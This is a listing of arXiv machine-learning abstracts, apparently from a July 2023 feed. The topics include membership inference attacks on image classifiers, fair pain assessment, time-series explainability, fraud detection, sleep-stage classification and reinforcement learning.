    Several membership inference (MI) attacks have been proposed to audit a target DNN. Given a set of subjects, MI attacks tell which subjects the target DNN has seen during training. This work focuses on the post-training MI attacks emphasizing high confidence membership detection -- True Positive Rates (TPR) at low False Positive Rates (FPR). Current works in this category -- likelihood ratio attack (LiRA) and enhanced MI attack (EMIA) -- only perform well on complex datasets (e.g., CIFAR-10 and Imagenet) where the target DNN overfits its train set, but perform poorly on simpler datasets (0% TPR by both attacks on Fashion-MNIST, 2% and 0% TPR respectively by LiRA and EMIA on MNIST at 1% FPR). To address this, firstly, we unify current MI attacks by presenting a framework divided into three stages -- preparation, indication and decision. Secondly, we utilize the framework to propose two novel attacks: (1) Adversarial Membership Inference Attack (AMIA) efficiently utilizes the membership and the non-membership information of the subjects while adversarially minimizing a novel loss function, achieving 6% TPR on both Fashion-MNIST and MNIST datasets; and (2) Enhanced AMIA (E-AMIA) combines EMIA and AMIA to achieve 8% and 4% TPRs on Fashion-MNIST and MNIST datasets respectively, at 1% FPR. Thirdly, we introduce two novel augmented indicators that positively leverage the loss information in the Gaussian neighborhood of a subject. This improves TPR of all four attacks on average by 2.5% and 0.25% respectively on Fashion-MNIST and MNIST datasets at 1% FPR. Finally, we propose simple, yet novel, evaluation metric, the running TPR average (RTA) at a given FPR, that better distinguishes different MI attacks in the low FPR region. We also show that AMIA and E-AMIA are more transferable to the unknown DNNs (other than the target DNN) and are more robust to DP-SGD training as compared to LiRA and EMIA.
    Unbiased Pain Assessment through Wearables and EHR Data: Multi-attribute Fairness Loss-based CNN Approach. (arXiv:2307.05333v1 [eess.SP])
    The combination of diverse health data (IoT, EHR, and clinical surveys) and scalable-adaptable Artificial Intelligence (AI), has enabled the discovery of physical, behavioral, and psycho-social indicators of pain status. Despite the hype and promise to fundamentally alter the healthcare system with technological advancements, much AI adoption in clinical pain evaluation has been hampered by the heterogeneity of the problem itself and other challenges, such as personalization and fairness. Studies have revealed that many AI (i.e., machine learning or deep learning) models display biases and discriminate against specific population segments (such as those based on gender or ethnicity), which breeds skepticism among medical professionals about AI adaptability. In this paper, we propose a Multi-attribute Fairness Loss (MAFL) based CNN model that aims to account for any sensitive attributes included in the data and fairly predict patients' pain status while attempting to minimize the discrepancies between privileged and unprivileged groups. In order to determine whether the trade-off between accuracy and fairness can be satisfied, we compare the proposed model with well-known existing mitigation procedures, and studies reveal that the implemented model performs favorably in contrast to state-of-the-art methods. Utilizing NIH All-Of-US data, where a cohort of 868 distinct individuals with wearables and EHR data gathered over 1500 days has been taken into consideration to analyze our suggested fair pain assessment system.
    A Deep Dive into Perturbations as Evaluation Technique for Time Series XAI. (arXiv:2307.05104v1 [cs.LG])
    Explainable Artificial Intelligence (XAI) has gained significant attention recently as the demand for transparency and interpretability of machine learning models has increased. In particular, XAI for time series data has become increasingly important in finance, healthcare, and climate science. However, evaluating the quality of explanations, such as attributions provided by XAI techniques, remains challenging. This paper provides an in-depth analysis of using perturbations to evaluate attributions extracted from time series models. A perturbation analysis involves systematically modifying the input data and evaluating the impact on the attributions generated by the XAI method. We apply this approach to several state-of-the-art XAI techniques and evaluate their performance on three time series classification datasets. Our results demonstrate that the perturbation analysis approach can effectively evaluate the quality of attributions and provide insights into the strengths and limitations of XAI techniques. Such an approach can guide the selection of XAI methods for time series data, e.g., focusing on return time rather than precision, and facilitate the development of more reliable and interpretable machine learning models for time series analysis.
    Application of data engineering approaches to address challenges in microbiome data for optimal medical decision-making. (arXiv:2307.00033v2 [q-bio.QM] UPDATED)
    The human gut microbiota is known to contribute to numerous physiological functions of the body and also implicated in a myriad of pathological conditions. Prolific research work in the past few decades have yielded valuable information regarding the relative taxonomic distribution of gut microbiota. Unfortunately, the microbiome data suffers from class imbalance and high dimensionality issues that must be addressed. In this study, we have implemented data engineering algorithms to address the above-mentioned issues inherent to microbiome data. Four standard machine learning classifiers (logistic regression (LR), support vector machines (SVM), random forests (RF), and extreme gradient boosting (XGB) decision trees) were implemented on a previously published dataset. The issue of class imbalance and high dimensionality of the data was addressed through synthetic minority oversampling technique (SMOTE) and principal component analysis (PCA). Our results indicate that ensemble classifiers (RF and XGB decision trees) exhibit superior classification accuracy in predicting the host phenotype. The application of PCA significantly reduced testing time while maintaining high classification accuracy. The highest classification accuracy was obtained at the levels of species for most classifiers. The prototype employed in the study addresses the issues inherent to microbiome datasets and could be highly beneficial for providing personalized medicine.
    Transaction Fraud Detection via Spatial-Temporal-Aware Graph Transformer. (arXiv:2307.05121v1 [cs.LG])
    How to obtain informative representations of transactions and then perform the identification of fraudulent transactions is a crucial part of ensuring financial security. Recent studies apply Graph Neural Networks (GNNs) to the transaction fraud detection problem. Nevertheless, they encounter challenges in effectively learning spatial-temporal information due to structural limitations. Moreover, few prior GNN-based detectors have recognized the significance of incorporating global information, which encompasses similar behavioral patterns and offers valuable insights for discriminative representation learning. Therefore, we propose a novel heterogeneous graph neural network called Spatial-Temporal-Aware Graph Transformer (STA-GT) for transaction fraud detection problems. Specifically, we design a temporal encoding strategy to capture temporal dependencies and incorporate it into the graph neural network framework, enhancing spatial-temporal information modeling and improving expressive ability. Furthermore, we introduce a transformer module to learn local and global information. Pairwise node-node interactions overcome the limitation of the GNN structure and build up the interactions with the target node and long-distance ones. Experimental results on two financial datasets compared to general GNN models and GNN-based fraud detectors demonstrate that our proposed method STA-GT is effective on the transaction fraud detection task.
    Classification of sleep stages from EEG, EOG and EMG signals by SSNet. (arXiv:2307.05373v1 [eess.SP])
    Classification of sleep stages plays an essential role in diagnosing sleep-related diseases including Sleep Disorder Breathing (SDB) disease. In this study, we propose an end-to-end deep learning architecture, named SSNet, which comprises of two deep learning networks based on Convolutional Neuron Networks (CNN) and Long Short Term Memory (LSTM). Both deep learning networks extract features from the combination of Electrooculogram (EOG), Electroencephalogram (EEG), and Electromyogram (EMG) signals, as each signal has distinct features that help in the classification of sleep stages. The features produced by the two-deep learning networks are concatenated to pass to the fully connected layer for the classification. The performance of our proposed model is evaluated by using two public datasets Sleep-EDF Expanded dataset and ISRUC-Sleep dataset. The accuracy and Kappa coefficient are 96.36% and 93.40% respectively, for classifying three classes of sleep stages using Sleep-EDF Expanded dataset. Whereas, the accuracy and Kappa coefficient are 96.57% and 83.05% respectively for five classes of sleep stages using Sleep-EDF Expanded dataset. Our model achieves the best performance in classifying sleep stages when compared with the state-of-the-art techniques.
    Multi-Task Learning to Enhance Generazability of Neural Network Equalizers in Coherent Optical Systems. (arXiv:2307.05374v1 [eess.SP])
    For the first time, multi-task learning is proposed to improve the flexibility of NN-based equalizers in coherent systems. A "single" NN-based equalizer improves Q-factor by up to 4 dB compared to CDC, without re-training, even with variations in launch power, symbol rate, or transmission distance.
    Fast Neural Network Inference on FPGAs for Triggering on Long-Lived Particles at Colliders. (arXiv:2307.05152v1 [hep-ex])
    Experimental particle physics demands a sophisticated trigger and acquisition system capable to efficiently retain the collisions of interest for further investigation. Heterogeneous computing with the employment of FPGA cards may emerge as a trending technology for the triggering strategy of the upcoming high-luminosity program of the Large Hadron Collider at CERN. In this context, we present two machine-learning algorithms for selecting events where neutral long-lived particles decay within the detector volume studying their accuracy and inference time when accelerated on commercially available Xilinx FPGA accelerator cards. The inference time is also confronted with a CPU- and GPU-based hardware setup. The proposed new algorithms are proven efficient for the considered benchmark physics scenario and their accuracy is found to not degrade when accelerated on the FPGA cards. The results indicate that all tested architectures fit within the latency requirements of a second-level trigger farm and that exploiting accelerator technologies for real-time processing of particle-physics collisions is a promising research field that deserves additional investigations, in particular with machine-learning models with a large number of trainable parameters.
    Decorrelation using Optimal Transport. (arXiv:2307.05187v1 [hep-ph])
    Being able to decorrelate a feature space from protected attributes is an area of active research and study in ethics, fairness, and also natural sciences. We introduce a novel decorrelation method using Convex Neural Optimal Transport Solvers (Cnots), that is able to decorrelate continuous feature space against protected attributes with optimal transport. We demonstrate how well it performs in the context of jet classification in high energy physics, where classifier scores are desired to be decorrelated from the mass of a jet. The decorrelation achieved in binary classification approaches the levels achieved by the state-of-the-art using conditional normalising flows. When moving to multiclass outputs the optimal transport approach performs significantly better than the state-of-the-art, suggesting substantial gains at decorrelating multidimensional feature spaces.
    $\ell_p$-Regression in the Arbitrary Partition Model of Communication. (arXiv:2307.05117v1 [cs.DS])
    We consider the randomized communication complexity of the distributed $\ell_p$-regression problem in the coordinator model, for $p\in (0,2]$. In this problem, there is a coordinator and $s$ servers. The $i$-th server receives $A^i\in\{-M, -M+1, \ldots, M\}^{n\times d}$ and $b^i\in\{-M, -M+1, \ldots, M\}^n$ and the coordinator would like to find a $(1+\epsilon)$-approximate solution to $\min_{x\in\mathbb{R}^n} \|(\sum_i A^i)x - (\sum_i b^i)\|_p$. Here $M \leq \mathrm{poly}(nd)$ for convenience. This model, where the data is additively shared across servers, is commonly referred to as the arbitrary partition model. We obtain significantly improved bounds for this problem. For $p = 2$, i.e., least squares regression, we give the first optimal bound of $\tilde{\Theta}(sd^2 + sd/\epsilon)$ bits. For $p \in (1,2)$,we obtain an $\tilde{O}(sd^2/\epsilon + sd/\mathrm{poly}(\epsilon))$ upper bound. Notably, for $d$ sufficiently large, our leading order term only depends linearly on $1/\epsilon$ rather than quadratically. We also show communication lower bounds of $\Omega(sd^2 + sd/\epsilon^2)$ for $p\in (0,1]$ and $\Omega(sd^2 + sd/\epsilon)$ for $p\in (1,2]$. Our bounds considerably improve previous bounds due to (Woodruff et al. COLT, 2013) and (Vempala et al., SODA, 2020).
    Contextual Pre-Planning on Reward Machine Abstractions for Enhanced Transfer in Deep Reinforcement Learning. (arXiv:2307.05209v1 [cs.AI])
    Recent studies show that deep reinforcement learning (DRL) agents tend to overfit to the task on which they were trained and fail to adapt to minor environment changes. To expedite learning when transferring to unseen tasks, we propose a novel approach to representing the current task using reward machines (RM), state machine abstractions that induce subtasks based on the current task's rewards and dynamics. Our method provides agents with symbolic representations of optimal transitions from their current abstract state and rewards them for achieving these transitions. These representations are shared across tasks, allowing agents to exploit knowledge of previously encountered symbols and transitions, thus enhancing transfer. Our empirical evaluation shows that our representations improve sample efficiency and few-shot transfer in a variety of domains.
    SimpleMTOD: A Simple Language Model for Multimodal Task-Oriented Dialogue with Symbolic Scene Representation. (arXiv:2307.04907v1 [cs.CL])
    SimpleMTOD is a simple language model which recasts several sub-tasks in multimodal task-oriented dialogues as sequence prediction tasks. SimpleMTOD is built on a large-scale transformer-based auto-regressive architecture, which has already proven to be successful in uni-modal task-oriented dialogues, and effectively leverages transfer learning from pre-trained GPT-2. In-order to capture the semantics of visual scenes, we introduce both local and de-localized tokens for objects within a scene. De-localized tokens represent the type of an object rather than the specific object itself and so possess a consistent meaning across the dataset. SimpleMTOD achieves a state-of-the-art BLEU score (0.327) in the Response Generation sub-task of the SIMMC 2.0 test-std dataset while performing on par in other multimodal sub-tasks: Disambiguation, Coreference Resolution, and Dialog State Tracking. This is despite taking a minimalist approach for extracting visual (and non-visual) information. In addition the model does not rely on task-specific architectural changes such as classification heads.
    Control as Probabilistic Inference as an Emergent Communication Mechanism in Multi-Agent Reinforcement Learning. (arXiv:2307.05004v1 [cs.AI])
    This paper proposes a generative probabilistic model integrating emergent communication and multi-agent reinforcement learning. The agents plan their actions by probabilistic inference, called control as inference, and communicate using messages that are latent variables and estimated based on the planned actions. Through these messages, each agent can send information about its actions and know information about the actions of another agent. Therefore, the agents change their actions according to the estimated messages to achieve cooperative tasks. This inference of messages can be considered as communication, and this procedure can be formulated by the Metropolis-Hasting naming game. Through experiments in the grid world environment, we show that the proposed PGM can infer meaningful messages to achieve the cooperative task.
    On the Use of Self-Supervised Speech Representations in Spontaneous Speech Synthesis. (arXiv:2307.05132v1 [eess.AS])
    Self-supervised learning (SSL) speech representations learned from large amounts of diverse, mixed-quality speech data without transcriptions are gaining ground in many speech technology applications. Prior work has shown that SSL is an effective intermediate representation in two-stage text-to-speech (TTS) for both read and spontaneous speech. However, it is still not clear which SSL and which layer from each SSL model is most suited for spontaneous TTS. We address this shortcoming by extending the scope of comparison for SSL in spontaneous TTS to 6 different SSLs and 3 layers within each SSL. Furthermore, SSL has also shown potential in predicting the mean opinion scores (MOS) of synthesized speech, but this has only been done in read-speech MOS prediction. We extend an SSL-based MOS prediction framework previously developed for scoring read speech synthesis and evaluate its performance on synthesized spontaneous speech. All experiments are conducted twice on two different spontaneous corpora in order to find generalizable trends. Overall, we present comprehensive experimental results on the use of SSL in spontaneous TTS and MOS prediction to further quantify and understand how SSL can be used in spontaneous TTS. Audios samples: https://www.speech.kth.se/tts-demos/sp_ssl_tts
    Using Linear Regression for Iteratively Training Neural Networks. (arXiv:2307.05189v1 [cs.LG])
    We present a simple linear regression based approach for learning the weights and biases of a neural network, as an alternative to standard gradient based backpropagation. The present work is exploratory in nature, and we restrict the description and experiments to (i) simple feedforward neural networks, (ii) scalar (single output) regression problems, and (iii) invertible activation functions. However, the approach is intended to be extensible to larger, more complex architectures. The key idea is the observation that the input to every neuron in a neural network is a linear combination of the activations of neurons in the previous layer, as well as the parameters (weights and biases) of the layer. If we are able to compute the ideal total input values to every neuron by working backwards from the output, we can formulate the learning problem as a linear least squares problem which iterates between updating the parameters and the activation values. We present an explicit algorithm that implements this idea, and we show that (at least for simple problems) the approach is more stable and faster than gradient-based backpropagation.
    Feature Activation Map: Visual Explanation of Deep Learning Models for Image Classification. (arXiv:2307.05017v1 [cs.CV])
    Decisions made by convolutional neural networks(CNN) can be understood and explained by visualizing discriminative regions on images. To this end, Class Activation Map (CAM) based methods were proposed as powerful interpretation tools, making the prediction of deep learning models more explainable, transparent, and trustworthy. However, all the CAM-based methods (e.g., CAM, Grad-CAM, and Relevance-CAM) can only be used for interpreting CNN models with fully-connected (FC) layers as a classifier. It is worth noting that many deep learning models classify images without FC layers, e.g., few-shot learning image classification, contrastive learning image classification, and image retrieval tasks. In this work, a post-hoc interpretation tool named feature activation map (FAM) is proposed, which can interpret deep learning models without FC layers as a classifier. In the proposed FAM algorithm, the channel-wise contribution weights are derived from the similarity scores between two image embeddings. The activation maps are linearly combined with the corresponding normalized contribution weights, forming the explanation map for visualization. The quantitative and qualitative experiments conducted on ten deep learning models for few-shot image classification, contrastive learning image classification and image retrieval tasks demonstrate the effectiveness of the proposed FAM algorithm.
    On the Effectiveness of Speech Self-supervised Learning for Music. (arXiv:2307.05161v1 [cs.SD])
    Self-supervised learning (SSL) has shown promising results in various speech and natural language processing applications. However, its efficacy in music information retrieval (MIR) still remains largely unexplored. While previous SSL models pre-trained on music recordings may have been mostly closed-sourced, recent speech models such as wav2vec2.0 have shown promise in music modelling. Nevertheless, research exploring the effectiveness of applying speech SSL models to music recordings has been limited. We explore the music adaption of SSL with two distinctive speech-related models, data2vec1.0 and Hubert, and refer to them as music2vec and musicHuBERT, respectively. We train $12$ SSL models with 95M parameters under various pre-training configurations and systematically evaluate the MIR task performances with 13 different MIR tasks. Our findings suggest that training with music data can generally improve performance on MIR tasks, even when models are trained using paradigms designed for speech. However, we identify the limitations of such existing speech-oriented designs, especially in modelling polyphonic information. Based on the experimental results, empirical suggestions are also given for designing future musical SSL strategies and paradigms.
    CREPE: Learnable Prompting With CLIP Improves Visual Relationship Prediction. (arXiv:2307.04838v1 [cs.CV])
    In this paper, we explore the potential of Vision-Language Models (VLMs), specifically CLIP, in predicting visual object relationships, which involves interpreting visual features from images into language-based relations. Current state-of-the-art methods use complex graphical models that utilize language cues and visual features to address this challenge. We hypothesize that the strong language priors in CLIP embeddings can simplify these graphical models paving for a simpler approach. We adopt the UVTransE relation prediction framework, which learns the relation as a translational embedding with subject, object, and union box embeddings from a scene. We systematically explore the design of CLIP-based subject, object, and union-box representations within the UVTransE framework and propose CREPE (CLIP Representation Enhanced Predicate Estimation). CREPE utilizes text-based representations for all three bounding boxes and introduces a novel contrastive training strategy to automatically infer the text prompt for union-box. Our approach achieves state-of-the-art performance in predicate estimation, mR@5 27.79, and mR@20 31.95 on the Visual Genome benchmark, achieving a 15.3\% gain in performance over recent state-of-the-art at mR@20. This work demonstrates CLIP's effectiveness in object relation prediction and encourages further research on VLMs in this challenging domain.
    A Theory of Bounded Inductive Rationality. (arXiv:2307.05068v1 [cs.AI])
    The dominant theories of rational choice assume logical omniscience. That is, they assume that when facing a decision problem, an agent can perform all relevant computations and determine the truth value of all relevant logical/mathematical claims. This assumption is unrealistic when, for example, we offer bets on remote digits of pi or when an agent faces a computationally intractable planning problem. Furthermore, the assumption of logical omniscience creates contradictions in cases where the environment can contain descriptions of the agent itself. Importantly, strategic interactions as studied in game theory are decision problems in which a rational agent is predicted by its environment (the other players). In this paper, we develop a theory of rational decision making that does not assume logical omniscience. We consider agents who repeatedly face decision problems (including ones like betting on digits of pi or games against other agents). The main contribution of this paper is to provide a sensible theory of rationality for such agents. Roughly, we require that a boundedly rational inductive agent tests each efficiently computable hypothesis infinitely often and follows those hypotheses that keep their promises of high rewards. We then prove that agents that are rational in this sense have other desirable properties. For example, they learn to value random and pseudo-random lotteries at their expected reward. Finally, we consider strategic interactions between different agents and prove a folk theorem for what strategies bounded rational inductive agents can converge to.
    Enhancing Continuous Time Series Modelling with a Latent ODE-LSTM Approach. (arXiv:2307.05126v1 [cs.LG])
    Due to their dynamic properties such as irregular sampling rate and high-frequency sampling, Continuous Time Series (CTS) are found in many applications. Since CTS with irregular sampling rate are difficult to model with standard Recurrent Neural Networks (RNNs), RNNs have been generalised to have continuous-time hidden dynamics defined by a Neural Ordinary Differential Equation (Neural ODE), leading to the ODE-RNN model. Another approach that provides a better modelling is that of the Latent ODE model, which constructs a continuous-time model where a latent state is defined at all times. The Latent ODE model uses a standard RNN as the encoder and a Neural ODE as the decoder. However, since the RNN encoder leads to difficulties with missing data and ill-defined latent variables, a Latent ODE-RNN model has recently been proposed that uses a ODE-RNN model as the encoder instead. Both the Latent ODE and Latent ODE-RNN models are difficult to train due to the vanishing and exploding gradients problem. To overcome this problem, the main contribution of this paper is to propose and illustrate a new model based on a new Latent ODE using an ODE-LSTM (Long Short-Term Memory) network as an encoder -- the Latent ODE-LSTM model. To limit the growth of the gradients the Norm Gradient Clipping strategy was embedded on the Latent ODE-LSTM model. The performance evaluation of the new Latent ODE-LSTM (with and without Norm Gradient Clipping) for modelling CTS with regular and irregular sampling rates is then demonstrated. Numerical experiments show that the new Latent ODE-LSTM performs better than Latent ODE-RNNs and can avoid the vanishing and exploding gradients during training.
    TIAM -- A Metric for Evaluating Alignment in Text-to-Image Generation. (arXiv:2307.05134v1 [cs.CV])
    The progress in the generation of synthetic images has made it crucial to assess their quality. While several metrics have been proposed to assess the rendering of images, it is crucial for Text-to-Image (T2I) models, which generate images based on a prompt, to consider additional aspects such as to which extent the generated image matches the important content of the prompt. Moreover, although the generated images usually result from a random starting point, the influence of this one is generally not considered. In this article, we propose a new metric based on prompt templates to study the alignment between the content specified in the prompt and the corresponding generated images. It allows us to better characterize the alignment in terms of the type of the specified objects, their number, and their color. We conducted a study on several recent T2I models about various aspects. An additional interesting result we obtained with our approach is that image quality can vary drastically depending on the latent noise used as a seed for the images. We also quantify the influence of the number of concepts in the prompt, their order as well as their (color) attributes. Finally, our method allows us to identify some latent seeds that produce better images than others, opening novel directions of research on this understudied topic.
    Diagnosing Model Performance Under Distribution Shift. (arXiv:2303.02011v4 [stat.ML] UPDATED)
    Prediction models can perform poorly when deployed to target distributions different from the training distribution. To understand these operational failure modes, we develop a method, called DIstribution Shift DEcomposition (DISDE), to attribute a drop in performance to different types of distribution shifts. Our approach decomposes the performance drop into terms for 1) an increase in harder but frequently seen examples from training, 2) changes in the relationship between features and outcomes, and 3) poor performance on examples infrequent or unseen during training. These terms are defined by fixing a distribution on $X$ while varying the conditional distribution of $Y \mid X$ between training and target, or by fixing the conditional distribution of $Y \mid X$ while varying the distribution on $X$. In order to do this, we define a hypothetical distribution on $X$ consisting of values common in both training and target, over which it is easy to compare $Y \mid X$ and thus predictive performance. We estimate performance on this hypothetical distribution via reweighting methods. Empirically, we show how our method can 1) inform potential modeling improvements across distribution shifts for employment prediction on tabular census data, and 2) help to explain why certain domain adaptation methods fail to improve model performance for satellite image classification.
    Benchmarking Algorithms for Federated Domain Generalization. (arXiv:2307.04942v1 [cs.LG])
    While prior domain generalization (DG) benchmarks consider train-test dataset heterogeneity, we evaluate Federated DG which introduces federated learning (FL) specific challenges. Additionally, we explore domain-based heterogeneity in clients' local datasets - a realistic Federated DG scenario. Prior Federated DG evaluations are limited in terms of the number or heterogeneity of clients and dataset diversity. To address this gap, we propose an Federated DG benchmark methodology that enables control of the number and heterogeneity of clients and provides metrics for dataset difficulty. We then apply our methodology to evaluate 13 Federated DG methods, which include centralized DG methods adapted to the FL context, FL methods that handle client heterogeneity, and methods designed specifically for Federated DG. Our results suggest that despite some progress, there remain significant performance gaps in Federated DG particularly when evaluating with a large number of clients, high client heterogeneity, or more realistic datasets. Please check our extendable benchmark code here: https://github.com/inouye-lab/FedDG_Benchmark.
    Benchmarking Bayesian Causal Discovery Methods for Downstream Treatment Effect Estimation. (arXiv:2307.04988v1 [cs.LG])
    The practical utility of causality in decision-making is widely recognized, with causal discovery and inference being inherently intertwined. Nevertheless, a notable gap exists in the evaluation of causal discovery methods, where insufficient emphasis is placed on downstream inference. To address this gap, we evaluate six established baseline causal discovery methods and a newly proposed method based on GFlowNets, on the downstream task of treatment effect estimation. Through the implementation of a robust evaluation procedure, we offer valuable insights into the efficacy of these causal discovery methods for treatment effect estimation, considering both synthetic and real-world scenarios, as well as low-data scenarios. Furthermore, the results of our study demonstrate that GFlowNets possess the capability to effectively capture a wide range of useful and diverse ATE modes.
    Onion Universe Algorithm: Applications in Weakly Supervised Learning. (arXiv:2307.04870v1 [cs.LG])
    We introduce Onion Universe Algorithm (OUA), a novel classification method in ensemble learning. In particular, we show its applicability as a label model for weakly supervised learning. OUA offers simplicity in implementation, computational efficiency, and does not rely on any assumptions regarding the data or weak signals. The model is well suited for scenarios where fully labeled data is not available. Our method is built upon geometrical interpretation of the space spanned by weak signals. Empirical results support our analysis of the hidden geometric structure underlying general set of weak signals and also illustrates that OUA works well in practice. We show empirical evidence that OUA performs favorably on common benchmark datasets compared to existing label models for weakly supervised learning.
    Reinforcement Learning with Non-Cumulative Objective. (arXiv:2307.04957v1 [cs.LG])
    In reinforcement learning, the objective is almost always defined as a \emph{cumulative} function over the rewards along the process. However, there are many optimal control and reinforcement learning problems in various application fields, especially in communications and networking, where the objectives are not naturally expressed as summations of the rewards. In this paper, we recognize the prevalence of non-cumulative objectives in various problems, and propose a modification to existing algorithms for optimizing such objectives. Specifically, we dive into the fundamental building block for many optimal control and reinforcement learning algorithms: the Bellman optimality equation. To optimize a non-cumulative objective, we replace the original summation operation in the Bellman update rule with a generalized operation corresponding to the objective. Furthermore, we provide sufficient conditions on the form of the generalized operation as well as assumptions on the Markov decision process under which the globally optimal convergence of the generalized Bellman updates can be guaranteed. We demonstrate the idea experimentally with the bottleneck objective, i.e., the objectives determined by the minimum reward along the process, on classical optimal control and reinforcement learning tasks, as well as on two network routing problems on maximizing the flow rates.
    Improving Fairness of Graph Neural Networks: A Graph Counterfactual Perspective. (arXiv:2307.04937v1 [cs.LG])
    Graph neural networks have shown great ability in representation (GNNs) learning on graphs, facilitating various tasks. Despite their great performance in modeling graphs, recent works show that GNNs tend to inherit and amplify the bias from training data, causing concerns of the adoption of GNNs in high-stake scenarios. Hence, many efforts have been taken for fairness-aware GNNs. However, most existing fair GNNs learn fair node representations by adopting statistical fairness notions, which may fail to alleviate bias in the presence of statistical anomalies. Motivated by causal theory, there are several attempts utilizing graph counterfactual fairness to mitigate root causes of unfairness. However, these methods suffer from non-realistic counterfactuals obtained by perturbation or generation. In this paper, we take a causal view on fair graph learning problem. Guided by the casual analysis, we propose a novel framework CAF, which can select counterfactuals from training data to avoid non-realistic counterfactuals and adopt selected counterfactuals to learn fair node representations for node classification task. Extensive experiments on synthetic and real-world datasets show the effectiveness of CAF.
    DDGM: Solving inverse problems by Diffusive Denoising of Gradient-based Minimization. (arXiv:2307.04946v1 [cs.CV])
    Inverse problems generally require a regularizer or prior for a good solution. A recent trend is to train a convolutional net to denoise images, and use this net as a prior when solving the inverse problem. Several proposals depend on a singular value decomposition of the forward operator, and several others backpropagate through the denoising net at runtime. Here we propose a simpler approach that combines the traditional gradient-based minimization of reconstruction error with denoising. Noise is also added at each step, so the iterative dynamics resembles a Langevin or diffusion process. Both the level of added noise and the size of the denoising step decay exponentially with time. We apply our method to the problem of tomographic reconstruction from electron micrographs acquired at multiple tilt angles. With empirical studies using simulated tilt views, we find parameter settings for our method that produce good results. We show that high accuracy can be achieved with as few as 50 denoising steps. We also compare with DDRM and DPS, more complex diffusion methods of the kinds mentioned above. These methods are less accurate (as measured by MSE and SSIM) for our tomography problem, even after the generation hyperparameters are optimized. Finally we extend our method to reconstruction of arbitrary-sized images and show results on 128 $\times$ 1568 pixel images
    SigOpt Mulch: An Intelligent System for AutoML of Gradient Boosted Trees. (arXiv:2307.04849v1 [cs.LG])
    Gradient boosted trees (GBTs) are ubiquitous models used by researchers, machine learning (ML) practitioners, and data scientists because of their robust performance, interpretable behavior, and ease-of-use. One critical challenge in training GBTs is the tuning of their hyperparameters. In practice, selecting these hyperparameters is often done manually. Recently, the ML community has advocated for tuning hyperparameters through black-box optimization and developed state-of-the-art systems to do so. However, applying such systems to tune GBTs suffers from two drawbacks. First, these systems are not \textit{model-aware}, rather they are designed to apply to a \textit{generic} model; this leaves significant optimization performance on the table. Second, using these systems requires \textit{domain knowledge} such as the choice of hyperparameter search space, which is an antithesis to the automatic experimentation that black-box optimization aims to provide. In this paper, we present SigOpt Mulch, a model-aware hyperparameter tuning system specifically designed for automated tuning of GBTs that provides two improvements over existing systems. First, Mulch leverages powerful techniques in metalearning and multifidelity optimization to perform model-aware hyperparameter optimization. Second, it automates the process of learning performant hyperparameters by making intelligent decisions about the optimization search space, thus reducing the need for user domain knowledge. These innovations allow Mulch to identify good GBT hyperparameters far more efficiently -- and in a more seamless and user-friendly way -- than existing black-box hyperparameter tuning systems.
    Dynamics of Temporal Difference Reinforcement Learning. (arXiv:2307.04841v1 [stat.ML])
    Reinforcement learning has been successful across several applications in which agents have to learn to act in environments with sparse feedback. However, despite this empirical success there is still a lack of theoretical understanding of how the parameters of reinforcement learning models and the features used to represent states interact to control the dynamics of learning. In this work, we use concepts from statistical physics, to study the typical case learning curves for temporal difference learning of a value function with linear function approximators. Our theory is derived under a Gaussian equivalence hypothesis where averages over the random trajectories are replaced with temporally correlated Gaussian feature averages and we validate our assumptions on small scale Markov Decision Processes. We find that the stochastic semi-gradient noise due to subsampling the space of possible episodes leads to significant plateaus in the value error, unlike in traditional gradient descent dynamics. We study how learning dynamics and plateaus depend on feature structure, learning rate, discount factor, and reward function. We then analyze how strategies like learning rate annealing and reward shaping can favorably alter learning dynamics and plateaus. To conclude, our work introduces new tools to open a new direction towards developing a theory of learning dynamics in reinforcement learning.
    Learning to Solve Constraint Satisfaction Problems with Recurrent Transformer. (arXiv:2307.04895v1 [cs.AI])
    Constraint satisfaction problems (CSPs) are about finding values of variables that satisfy the given constraints. We show that Transformer extended with recurrence is a viable approach to learning to solve CSPs in an end-to-end manner, having clear advantages over state-of-the-art methods such as Graph Neural Networks, SATNet, and some neuro-symbolic models. With the ability of Transformer to handle visual input, the proposed Recurrent Transformer can straightforwardly be applied to visual constraint reasoning problems while successfully addressing the symbol grounding problem. We also show how to leverage deductive knowledge of discrete constraints in the Transformer's inductive learning to achieve sample-efficient learning and semi-supervised learning for CSPs.
    Route, Interpret, Repeat: Blurring the line between post hoc explainability and interpretable models. (arXiv:2307.05350v1 [cs.LG])
    The current approach to ML model design is either to choose a flexible Blackbox model and explain it post hoc or to start with an interpretable model. Blackbox models are flexible but difficult to explain, whereas interpretable models are designed to be explainable. However, developing interpretable models necessitates extensive ML knowledge, and the resulting models tend to be less flexible, offering potentially subpar performance compared to their Blackbox equivalents. This paper aims to blur the distinction between a post hoc explanation of a BlackBox and constructing interpretable models. We propose beginning with a flexible BlackBox model and gradually \emph{carving out} a mixture of interpretable models and a \emph{residual network}. Our design identifies a subset of samples and \emph{routes} them through the interpretable models. The remaining samples are routed through a flexible residual network. We adopt First Order Logic (FOL) as the interpretable model's backbone, which provides basic reasoning on concepts retrieved from the BlackBox model. On the residual network, we repeat the method until the proportion of data explained by the residual network falls below a desired threshold. Our approach offers several advantages. First, the mixture of interpretable and flexible residual networks results in almost no compromise in performance. Second, the route, interpret, and repeat approach yields a highly flexible interpretable model. Our extensive experiment demonstrates the performance of the model on various datasets. We show that by editing the FOL model, we can fix the shortcut learned by the original BlackBox model. Finally, our method provides a framework for a hybrid symbolic-connectionist network that is simple to train and adaptable to many applications.
    SHAP@k:Efficient and Probably Approximately Correct (PAC) Identification of Top-k Features. (arXiv:2307.04850v1 [cs.LG])
    The SHAP framework provides a principled method to explain the predictions of a model by computing feature importance. Motivated by applications in finance, we introduce the Top-k Identification Problem (TkIP), where the objective is to identify the k features with the highest SHAP values. While any method to compute SHAP values with uncertainty estimates (such as KernelSHAP and SamplingSHAP) can be trivially adapted to solve TkIP, doing so is highly sample inefficient. The goal of our work is to improve the sample efficiency of existing methods in the context of solving TkIP. Our key insight is that TkIP can be framed as an Explore-m problem--a well-studied problem related to multi-armed bandits (MAB). This connection enables us to improve sample efficiency by leveraging two techniques from the MAB literature: (1) a better stopping-condition (to stop sampling) that identifies when PAC (Probably Approximately Correct) guarantees have been met and (2) a greedy sampling scheme that judiciously allocates samples between different features. By adopting these methods we develop KernelSHAP@k and SamplingSHAP@k to efficiently solve TkIP, offering an average improvement of $5\times$ in sample-efficiency and runtime across most common credit related datasets.
    Fed-CPrompt: Contrastive Prompt for Rehearsal-Free Federated Continual Learning. (arXiv:2307.04869v1 [cs.LG])
